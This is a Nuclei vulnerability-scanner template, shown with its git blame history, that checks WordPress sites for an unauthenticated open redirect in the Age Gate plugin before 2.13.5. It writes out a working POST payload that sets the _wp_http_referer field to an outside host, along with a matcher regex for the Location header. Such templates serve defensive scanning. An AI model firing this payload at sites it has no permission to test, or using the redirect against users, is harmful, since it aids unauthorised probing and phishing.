nuclei-templates/vulnerabilities/wordpress/age-gate-open-redirect.yaml

id: age-gate-open-redirect

info:
  name: Age Gate < 2.13.5 - Unauthenticated Open Redirect
  author: akincibor
  severity: low
  description: The plugin takes the _wp_http_referer parameter to redirect users after some actions as well as after invalid or missing nonces, leading to an Unauthenticated Open Redirect issue.
  reference:
    - https://wpscan.com/vulnerability/10489
    - https://packetstormsecurity.com/files/160236/
    - https://wordpress.org/plugins/age-gate
  metadata:
    verified: true
  tags: agegate,unauth,wpscan,packetstorm,wp-plugin,redirect,wordpress,wp

requests:
  - method: POST
    path:
      - '{{BaseURL}}/wp-admin/admin-post.php'

    body: age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=https://interact.sh
    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
Create age-gate-open-redirect.yaml 2022-05-10 20:44:39 +00:00			`id: age-gate-open-redirect`

			`info:`
			`name: Age Gate < 2.13.5 - Unauthenticated Open Redirect`
			`author: akincibor`
			`severity: low`
			`description: The plugin takes the _wp_http_referer parameter to redirect users after some actions as well as after invalid or missing nonces, leading to an Unauthenticated Open Redirect issue.`
			`reference:`
			`- https://wpscan.com/vulnerability/10489`
			`- https://packetstormsecurity.com/files/160236/`
			`- https://wordpress.org/plugins/age-gate`
			`metadata:`
			`verified: true`
Auto Generated CVE annotations [Sat Aug 27 04:41:18 UTC 2022] :robot: 2022-08-27 04:41:18 +00:00			`tags: agegate,unauth,wpscan,packetstorm,wp-plugin,redirect,wordpress,wp`
Create age-gate-open-redirect.yaml 2022-05-10 20:44:39 +00:00
			`requests:`
			`- method: POST`
			`path:`
			`- '{{BaseURL}}/wp-admin/admin-post.php'`

Fixed possible FPs in open redirect templates (#4544) * Fixed possible FPs in open redirect templates We have replaced example.com with interact.sh since few domains redirect to example.com, which results in FP results. * updated example domain Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-06-06 10:40:15 +00:00			`body: age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=https://interact.sh`
Create age-gate-open-redirect.yaml 2022-05-10 20:44:39 +00:00			`headers:`
			`Content-Type: application/x-www-form-urlencoded`

			`matchers:`
			`- type: regex`
			`part: header`
			`regex:`
Fixed possible FPs in open redirect templates (#4544) * Fixed possible FPs in open redirect templates We have replaced example.com with interact.sh since few domains redirect to example.com, which results in FP results. * updated example domain Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-06-06 10:40:15 +00:00			`- '(?m)^(?:Location\s?:\s?)(?:https?:\/\/\|\/\/\|\/\\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@])interact\.sh\/?(\/\|[^.].)?$' # https://regex101.com/r/ZDYhFh/1`